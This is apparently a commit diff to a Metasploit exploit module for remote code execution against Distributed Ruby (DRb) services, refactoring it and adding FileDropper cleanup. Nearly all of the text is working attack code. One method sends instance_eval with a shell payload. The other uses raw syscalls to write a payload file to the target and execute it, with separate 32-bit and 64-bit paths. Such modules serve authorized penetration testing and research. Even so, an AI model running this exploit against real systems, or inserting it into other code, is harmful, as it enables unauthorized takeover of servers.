Refactor module and use FileDropper
William Vu
parent
6d7cf81429
commit
f0c89ffb56
|
|
@ -7,8 +7,11 @@ require 'msf/core'
|
|||
require 'drb/drb'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Distributed Ruby Send instance_eval/syscall Code Execution',
|
||||
|
|
@ -58,19 +61,37 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
class << p
|
||||
undef :send
|
||||
end
|
||||
|
||||
case target.name
|
||||
when 'instance_eval'
|
||||
print_status('Trying to exploit instance_eval')
|
||||
exploit_instance_eval(p)
|
||||
when 'syscall'
|
||||
print_status('Trying to exploit syscall')
|
||||
exploit_syscall(p)
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_instance_eval(p)
|
||||
begin
|
||||
print_status('trying to exploit instance_eval')
|
||||
p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
|
||||
rescue SecurityError
|
||||
print_error('instance_eval failed due to security error')
|
||||
rescue DRb::DRbConnError
|
||||
print_error('instance_eval failed due to connection error')
|
||||
end
|
||||
end
|
||||
|
||||
rescue SecurityError => e
|
||||
print_status('instance eval failed, trying to exploit syscall')
|
||||
filename = "." + Rex::Text.rand_text_alphanumeric(16)
|
||||
def exploit_syscall(p)
|
||||
filename = "." + Rex::Text.rand_text_alphanumeric(16)
|
||||
|
||||
begin
|
||||
begin
|
||||
|
||||
print_status('Attempting 32-bit exploitation')
|
||||
# syscall to decide wether it's 64 or 32 bit:
|
||||
# it's getpid on 32bit which will succeed, and writev on 64bit
|
||||
# which will fail due to missing args
|
||||
j = p.send(:syscall,20)
|
||||
p.send(:syscall,20)
|
||||
# syscall open
|
||||
i = p.send(:syscall,8,filename,0700)
|
||||
# syscall write
|
||||
|
|
@ -82,13 +103,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# syscall execve
|
||||
p.send(:syscall,11,filename,0,0)
|
||||
|
||||
# not vulnerable
|
||||
rescue SecurityError => e
|
||||
|
||||
print_status('target is not vulnerable')
|
||||
|
||||
# likely 64bit system
|
||||
rescue => e
|
||||
rescue Errno::EBADF
|
||||
print_status('Target is a 64-bit system')
|
||||
# syscall creat
|
||||
i = p.send(:syscall,85,filename,0700)
|
||||
# syscall write
|
||||
|
|
@ -100,9 +117,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# syscall execve
|
||||
p.send(:syscall,59,filename,0,0)
|
||||
end
|
||||
|
||||
# not vulnerable
|
||||
rescue SecurityError
|
||||
print_error('syscall failed due to security error')
|
||||
return
|
||||
rescue DRb::DRbConnError
|
||||
print_error('syscall failed due to connection error')
|
||||
return
|
||||
end
|
||||
print_status("payload executed from file #{filename}") unless filename.nil?
|
||||
print_status("make sure to remove that file") unless filename.nil?
|
||||
handler(nil)
|
||||
|
||||
register_files_for_cleanup(filename)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue